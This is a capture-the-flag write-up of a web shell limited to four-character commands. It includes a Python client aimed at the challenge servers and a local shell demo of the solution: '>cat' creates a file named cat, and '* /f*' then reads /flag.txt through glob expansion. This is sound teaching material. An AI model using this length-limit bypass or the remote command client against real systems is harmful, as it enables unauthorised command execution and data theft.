# Hackme
We were given the challenge text:
```
can you please just hack me, I will execute all your commands but only 4 chars in length

EU instance

US instance

author: pop_eax
```

I personally would say that this is closer to a misc challenge than a web, but it was still fun! The website was pretty much just a web interface for a shell, so I made a (way too advanced) Python script to interact with it.
```py
import requests

# Challenge instances given in the task description
servers = {
    'eu': 'http://207.180.200.166:8000/',
    'us': 'http://45.134.3.200:8000/'
}

server = input('EU or US?\n> ').lower()

url = servers[server]

while True:
    cmd = input('$ ')

    if cmd == 'reset':
        # Hit the reset endpoint
        res = requests.get(url, params={'reset': 1}).text
    elif cmd == 'q':
        quit()
    else:
        # Let requests URL-encode the command (spaces, '&', '+', ...)
        res = requests.get(url, params={'cmd': cmd}).text
    print(res)
```

Our goal was to view the contents of the flag in `/flag.txt`. In typical me style, I overcomplicated everything. I spent probably a day trying to craft an exploit that allowed me to curl my own server for a file containing `cat /flag.txt`, but of course curl didn't work, and I had to try again. A lot of my earlier testing included `*`, so I had done some research on how exactly it works. After a bit of thinking, I realized I could create a file titled `cat`, and if it was the only file in the directory I could simply type `*`, and it would be replaced by `cat`. The final solution was a simple 2 lines: `>cat` (creates the file) and `* /f*` (cats /flag.txt). The result was `flag{[email protected]_5pl1t_Em3012}`.
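The glob behaviour described above, reproduced locally as an added example (not part of the original writeup): it shows that the shell expands `*` before it looks up the command, so a length check on the typed input does not bound what actually runs. The temp directory layout, the function names and the sample flag content are assumptions constructed for the demo.

```shell
# Added demonstration. Everything lives in a throwaway temp dir and the
# "flag" content is a constructed sample value.

setup_sandbox() {
    root=$(mktemp -d) || return 1
    mkdir "$root/work" "$root/data"
    printf 'constructed-sample-flag\n' > "$root/data/flag.txt"
}

# Show the words the shell produces from `* ../data/f*` without running them.
expanded_words() {
    setup_sandbox || return 1
    (
        cd "$root/work" || exit 1
        >cat                    # redirection with no command: creates empty file "cat"
        set -- * ../data/f*     # pathname expansion fills the positional parameters
        printf '%s\n' "$*"
    )
    rm -rf "$root"
}

# Run the same line as a command: the first expanded word becomes the command name.
run_glob_command() {
    setup_sandbox || return 1
    (
        cd "$root/work" || exit 1
        >cat
        * ../data/f*            # executed as: cat ../data/flag.txt
    )
    rm -rf "$root"
}

expanded_words      # cat ../data/flag.txt
run_glob_command    # constructed-sample-flag
```

The empty file named `cat` is never executed; it only supplies the word `cat`, which the shell then resolves through `PATH` as usual.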

Original writeup (https://github.com/WastefulNick/CTF-Writeups/tree/master/0x41414141/web/hackme).